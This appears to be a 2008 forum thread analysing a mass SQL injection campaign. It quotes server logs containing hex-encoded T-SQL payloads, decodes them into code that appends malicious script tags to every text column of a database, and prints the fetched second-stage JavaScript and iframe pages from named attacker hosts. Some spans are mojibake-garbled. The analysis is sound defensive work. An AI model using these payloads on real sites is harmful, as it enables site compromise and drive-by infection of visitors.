New sql injection, weve seen 418 seperate injection attempts involving the script within the last 24 hours.

Sample Log entry, IP obfuscated for privacy

Code: [Select]

xxx.xxx.xxx.xxx - - [20/Aug/2008:20:17:01 +0000] "GET /forums/index.php?showtopic=1440';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.59 http://bsalsa.com/ EmbeddedWB- 14.59  from: http://bsalsa.com/ )" (malwarebytes.org) "-"

Decoded

Code: [Select]

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"!
></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Weve also seen a second version of this script, differences as follows

Code: [Select]

0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652!
0272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded

Code: [Select]

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like2!
rrR#ãÂ÷F—FÆSãÇ67&—B7&3Ò&‡GG¢ò÷wws"ã–Æ2æ6âö77'72÷ræ§2#ãÂ÷67&—CãÂÒÒrrr”dUD4‚äU…Be$ôÒF&ÆUô7W'6÷"”åDòBÄ2TäB4Äõ4RF&ÆUô7W'6÷"DTÄÄô4DRF&ÆUô7W'6÷2

Code: [Select]

--11:38:09--  http://www2.1000ylc.cn/csrss/w.js
           => `w.js' 
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/notnew.htm></iframe>");

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

Code: [Select]

--11:39:44--  http://count41.51yes.com/sa.aspx
           => `sa.aspx' 
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected 
HTTP request sent, awaiting response... 500

Code: [Select]

--11:40:21--  http://www2.1000ylc.cn/csrss/new.htm
           => `new.htm' 
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>

Code: [Select]

--11:41:56--  http://www2.1000ylc.cn/csrss/notnew.htm
           => `notnew.htm' 
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]


<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2087412.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>

Code: [Select]

--11:43:17--  http://s96.cnzz.com/stat.php
           => `stat.php' 
Resolving s96.cnzz.com... 219.232.243.5
Connecting to s96.cnzz.com[219.232.243.5]:80... connected 
HTTP request sent, awaiting response... 200 OK

This returned a 0 byte page

Code: [Select]

--11:44:38--  http://js.users.51.la/2087353.js
           => `2087353.js' 
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters. 
window.onerror=function(){return true};
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');

Code: [Select]

--11:46:04--  http://js.users.51.la/2087412.js
           => `2087412.js' 
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

document.write ('<a href="http://www.51.la/?2087412" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters. 
window.onerror=function(){return true};
document.write ('<script>var a7412tf="51la";var a7412pu="";var a7412pf="51la";var a7412su=window.location;var a7412sf=document.referrer;var a7412of="";var a7412op="";var a7412ops=1;var a7412ot=1;var a7412d=new Date();var a7412color="";if (navigator.appName=="Netscape"){a7412color=screen.pixelDepth;} else {a7412color=screen.colorDepth;}<\/script><script>a7412tf=top.document.referrer;<\/script><script>a7412pu =window.parent.location;<\/script><script>a7412pf=window.parent.document.referrer;<\/script><script>a7412ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7412ops=(a7412ops==null)?1: (parseInt(unescape((a7412ops)[2]))+1);var a7412oe =new Date();a7412oe.setTime(a7412oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7412ops+ ";path=/;expires="+a7412oe.toGMTString();a7412ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7412ot==null){a7412ot=1;}else{a7412ot=parseInt(unescape((a7412ot)[2])); a7412ot=(a7412ops==1)?(a7412ot+1):(a7412ot);}a7412oe.setTime(a7412oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7412ot+";path=/;expires="+a7412oe.toGMTString();<\/script><script>a7412of=a7412sf;if(a7412pf!=="51la"){a7412of=a7412pf;}if(a7412tf!=="51la"){a7412of=a7412tf;}a7412op=a7412pu;try{lainframe}catch(e){a7412op=a7412su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087412&tpages=\'+a7412ops+\'&ttimes=\'+a7412ot+\'&tzone=\'+(0-a7412d.getTimezoneOffset()/60)+\'&tcolor=\'+a7412color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7412of)+\'&vpage=\'+escape(a7412op)+\'" \/>\');<\/script>');

Orac · August 22, 2008, 11:12:17 am

Sample Log entry, IP address obfuscated for privacy

Code: [Select]

xxx.xxx.xxx.xxx - - [22/Aug/2008:03:08:47 +0000] "GET /forums/index.php?showtopic=3063';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; .NET CLR 1.1.4322; InfoPath.1)" (malwarebytes.org) "-"

Decoded

Code: [Select]

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Code: [Select]

--11:43:29--  http://www0.douhunqn.cn/csrss/w.js 
           => `w.js' 
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}else{

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

Code: [Select]

--11:45:34--  http://count41.51yes.com/sa.aspx 
           => `sa.aspx' 
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected 
HTTP request sent, awaiting response... 500

Code: [Select]

<html>
    <head>
        <title>ÔËÐÐÊ±´íÎó</title>
        <style>
        	body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} 
        	p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        	b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        	H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        	H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        	pre {font-family:"Lucida Console";font-size: .9em}
        	.marker {font-weight: bold; color: black;text-decoration: none;}
        	.version {color: gray;}
        	.error {margin-bottom: 10px;}
        	.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>¡°/¡±Ó¦ÓÃ³ÌÐòÖÐµÄ·þÎñÆ÷´íÎó¡£<hr width=100% size=1 color=silver></H1>

            <h2> <i>ÔËÐÐÊ±´íÎó</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> ËµÃ÷: </b>·þÎñÆ÷ÉÏ³öÏÖÓ¦ÓÃ³ÌÐò´íÎó¡£´ËÓ¦ÓÃ³ÌÐòµÄµ±Ç°×Ô¶¨Òå´íÎóÉèÖÃ½ûÖ¹Ô¶³Ì²é¿´Ó¦ÓÃ³ÌÐò´íÎóµÄÏêÏ¸ÐÅÏ¢(³öÓÚ°²È«ÔÒò)¡£µ«¿ÉÒÔÍ¨¹ýÔÚ±¾µØ·þÎñÆ÷¼ÆËã»úÉÏÔËÐÐµÄä¯ÀÀÆ÷²é¿´¡£
            <br><br>

            <b>ÏêÏ¸ÐÅÏ¢:</b> ÈôÒªÊ¹ËûÈËÄÜ¹»ÔÚÔ¶³Ì¼ÆËã»úÉÏ²é¿´´ËÌØ¶¨´íÎóÐÅÏ¢µÄÏêÏ¸ÐÅÏ¢£¬ÇëÔÚÎ»ÓÚµ±Ç° Web Ó¦ÓÃ³ÌÐò¸ùÄ¿Â¼ÏÂµÄ¡°web.config¡±ÅäÖÃÎÄ¼þÖÐ´´½¨Ò»¸ö &lt;customErrors&gt; ±ê¼Ç¡£È»ºóÓ¦½«´Ë &lt;customErrors&gt; ±ê¼ÇµÄ¡°mode¡±ÊôÐÔÉèÖÃÎª¡°Off¡±¡£<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config ÅäÖÃÎÄ¼þ --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>×¢ÊÍ:</b> Í¨¹ýÐÞ¸ÄÓ¦ÓÃ³ÌÐòµÄ &lt;customErrors&gt; ÅäÖÃ±ê¼ÇµÄ¡°defaultRedirect¡±ÊôÐÔ£¬Ê¹Ö®Ö¸Ïò×Ô¶¨Òå´íÎóÒ³µÄ URL£¬¿ÉÒÔÓÃ×Ô¶¨Òå´íÎóÒ³Ìæ»»Ëù¿´µ½µÄµ±Ç°´íÎóÒ³¡£<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config ÅäÖÃÎÄ¼þ --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>

Code: [Select]

--11:48:08--  http://www0.douhunqn.cn/csrss/new.htm 
           => `new.htm' 
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]


<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>

Code: [Select]

--11:51:03--  http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605
           => `stat.php?id=1019605&web_id=1019605' 
Resolving s96.cnzz.com... 219.232.241.133
Connecting to s96.cnzz.com[219.232.241.133]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

function gv_cnzz(of){
	var es = document.cookie.indexOf(";",of);
	if(es==-1) es=document.cookie.length;
	return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
	var arg=n+"=";
	var alen=arg.length;
	var clen=document.cookie.length;
	var i=0;
	while(i<clen){
	var j=i+alen;
	if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
	i=document.cookie.indexOf(" ",i)+1;
	if(i==0)	break;
	}
	return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.17388800 1219402362';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="Õ¾³¤Í³¼Æ">Õ¾³¤Í³¼Æ</a>');
document.write('<img src="http://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";

Code: [Select]

--11:55:32--  http://js.users.51.la/2087353.js
           => `2087353.js' 
Resolving js.users.51.la... 122.224.146.36
Connecting to js.users.51.la[122.224.146.36]:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters. 
window.onerror=function(){return true};
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');

Code: [Select]

--11:58:01--  http://www.cnzz.com/stat/website.php?web_id=1019605
           => `website.php?web_id=1019605' 
Resolving www.cnzz.com... 127.0.0.1
Connecting to www.cnzz.com[127.0.0.1]:80... connected 
HTTP request sent, awaiting response... 500

Comment, null rooted by DNS.

Code: [Select]

